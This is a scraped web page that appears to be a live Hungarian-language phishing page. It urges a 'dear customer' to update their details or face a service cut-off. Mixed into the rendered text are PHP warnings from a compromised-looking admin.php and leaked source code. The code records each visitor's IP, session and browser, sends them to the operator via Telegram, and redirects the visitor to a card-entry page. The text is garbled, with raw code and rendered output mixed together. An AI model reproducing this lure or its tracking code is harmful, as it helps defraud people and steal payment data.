Tisztelt Ügyfelünk
Kérjük, frissítse adatait a lehető leghamarabb. Amennyiben ez nem történik meg, nem vállalunk felelősséget a szolgáltatás esetleges megszakadásáért vagy korlátozásáért.
???
123123123123
.....................................................................................................................................???
123123123123
.....................................................................................................................................
Warning: Undefined variable $auth in /home/elquintoelemento/public_html/admin.php on line 546
Warning: Trying to access array offset on null in /home/elquintoelemento/public_html/admin.php on line 546
Warning: Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in /home/elquintoelemento/public_html/admin.php on line 188
Warning: Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in /home/elquintoelemento/public_html/admin.php on line 189
🎯 New Visitor Clicked Button\n\n";
$message .= "👤 Session: " . substr($sessionId, 0, 8) . "...\n";
$message .= "🌐 IP: " . $ip . "\n";
$message .= "🔘 Button: " . ($buttonType == 'new' ? 'Új ügyfél' : 'Meglévő ügyfél') . "\n";
$message .= "⏰ Time: " . date('Y-m-d H:i:s') . "\n";
$message .= "🖥️ Browser: " . substr($ua, 0, 50) . "...";
// Send notification to Telegram
sendTelegramMessage($message);
// Log the action
logMessage('INFO', 'Button clicked, notification sent to Telegram', [
'button' => $buttonType,
'session' => substr($sessionId, 0, 8)
]);
// Redirect to card page
header('Location: pages/card.php');
exit;
}
$paths = getPaths();
?>
Kérjük, frissítse adatait a lehető leghamarabb. Amennyiben ez nem történik meg, nem vállalunk felelősséget a szolgáltatás esetleges megszakadásáért vagy korlátozásáért.